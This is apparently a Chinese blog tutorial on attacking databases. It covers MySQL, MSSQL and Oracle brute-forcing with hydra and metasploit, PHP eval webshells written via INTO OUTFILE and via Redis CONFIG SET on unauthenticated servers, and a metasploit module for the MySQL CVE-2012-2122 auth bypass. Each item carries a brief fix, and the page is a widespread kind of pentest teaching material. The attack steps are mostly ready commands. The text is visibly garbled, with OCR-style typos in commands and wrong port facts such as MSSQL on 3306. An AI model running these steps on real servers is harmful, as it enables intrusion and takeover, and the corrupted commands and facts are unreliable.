数据库安全

数据库安全基础

什么是数据库

数据库是”按照数据结构来组织、存储和管理数据的仓库”。是一个长期存储在计算机内的、有组织的、可共享的、统一管理的大量数据的集合。

有哪些数据库

从当前业界的使用情况来看,数据库按照不同的数据结构分为关系型数据库非关系型数据库关系型数据库是指采用了关系模型来组织数据的数据库。简单来说,关系模式就是二维表格模型。NoSQL非关系型数据库主要指那些非关系型的、分布式的,且-般不保证ACID的数据存储系统。

数据库存在的安全威胁

实战中数据库常见漏洞:
1.数据库弱口令(暴力破解)
2. Web应用程序安全性不足( SQL注入)
3.数据库配置隐患(写文件权限, getshell )
4.末授权漏洞( Redis、MongoDB )
5.数据库产品漏洞

数据库漏洞利用与防护

数据库弱口令

MySQL-暴力破解
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB公司开发,属于Oracle旗下产品。MySQL是最流行的关系型数据库管理系统之一, 在WEB应用方面, MySQL是最好的关系数据库管理系统应用软件之一。
MySQL默认端口: 3306
工具:hydra、超级弱口令爆破工具、mestasploit
hydra -L [用户] J -P [密码字典] [IP] mysql

mestasploit
msf > use auxiliary/ scanner/mysq1/mysq1_ 1ogin (使用mysq1 1ogin模块)
msf auxiliary(mysql_ login) > show options ( 查看选项)
msf auxiliary(mysql_ 1ogin) > set RHOSTS 192. 168.230.176 (目标)
msf auxiliary(mysq1_ 1ogin) > set USERNAME root (指定用户)
msf auxiliary(mysql_ login) > set PASS_ FILE /root/pass.txt (密码字典文件)
msf auxiliary(mysql_ 1ogin) > exploit (开始)
漏洞修复:更换强密码

SQL Server-暴力破解

MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库.
MSSQL默认端口: 3306
工具: hydra、超级弱口令爆破工具、mestasploit
hydra -L [用户] -P [密码字典] [IP] mssql

mestasploit
msf > use auxiliary/scanner/mssq1/mssq1_ 1ogin ( 使用mssql_ 1ogin模块)
msf auxiliary(mssql_ login) > show options ( 查看选项)
msf auxiliary(mssql
login) > set RHOSTS 10.107.0.64(目标)
msf auxiliary(mssql_ login) > set USER_ FILE /root/username.txt (用户名字典)
msf auxiliary(mssql_ 1ogin) > set PASS FILE /root/pass.txt (密码字典文件)
msf auxiliary(mssql_ 1ogin) > exploit (开始)

0racle-暴力破解
Oracle Database ,又名0racle RDBMS ,或简称0racle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域- -直处于领先地位的产品。 可以说0racle数据库系统是目前世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是- -种高效率、可靠性好的、适应高吞吐量的数据库方案。
MSSQL默认端口: 1521
工具: hydra、超级弱口令爆破工具、mestasploit
hydra -L [用户] -P [密码字典] [IP] oracle

mestasploit
use auxiliary/ admin/oracle/oracle_ login
set RHOST 192.168.0.91
set SID oracle

数据库配置隐患

Mysql权限配置- getshell
1、into oufile函数将she11写入web目录
利用条件:
■知道网站物理路径 ( phpinfo页面泄露、load_ file读配置文件)
■高权限数据库用户 ( dbs )
■load
file()开启即secure_ file priv 无限制
■网站路径有写入权限
利用步骤:
1 show global variables like ’ %secure_ file_ priv%’ ;
2 SELECT “<?php @eval($_ POST[ '123']);?>” INTO OUTFILE “网站物理路径”
3蚁剑连接webshell

漏洞修复:禁用into outfile函数,使用低权限用户开启mysql

未授权漏洞

Redis -未授权漏洞

漏洞描述:
Redis默认情况下,会绑定在0.0.0.0:6379 ,如果没有设置相关策略,比.如添加防火墙规则避免其他非信任来源ip访问,将会使Redis服务暴露在公网上,
在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redi s的数据。
攻击者在未授权访问Redi s的情况下,利用Redis自身的提供的config命令。进行getshell.
■向Web目录中写入 webshell getshell
■写crontab计划任务反弹shell getshell
■写SSH key getshell
漏洞修复:安装时设置密码,设置防火墙策略

利用步骤:

  1. redis-cli -h 10.20.125.120 #客户端连接至redis

  2. config set dir /var/www/ html #设置写入目录

  3. config set dbfilename shell. php #设置写入文件

  4. set webshell “<?php @eval($_ POST[123]);?>” #以键值对的形式写入一句话木马

  5. save #保存

数据库产品漏洞

Mysql身份认证漏洞
MySQL身份认证漏洞CVE-2012-2122 :
■漏洞原理:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回-个非零值,也会使MySQL认为两个密码是相同的。大约256次就能够蒙对一-次。
■影响版本:最高5.1.61、5.2.11、 5.3.5、 5.5.22的所有MariaDB和MySQL版本
■漏洞修复:更新Mysql

利用步骤:
mestasploit
msf > use auxiliary/ scanner/ mysql/mysql_ authbypass hash
msf auxiliary(mysql
authbypass hash) > show options ( 查看选项)
msf auxiliary(mysql
authbypass_ hash) > set RHOSTS 192.168.230.176( 目标)
msf auxiliary (mysql
authbypass hash) > run

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值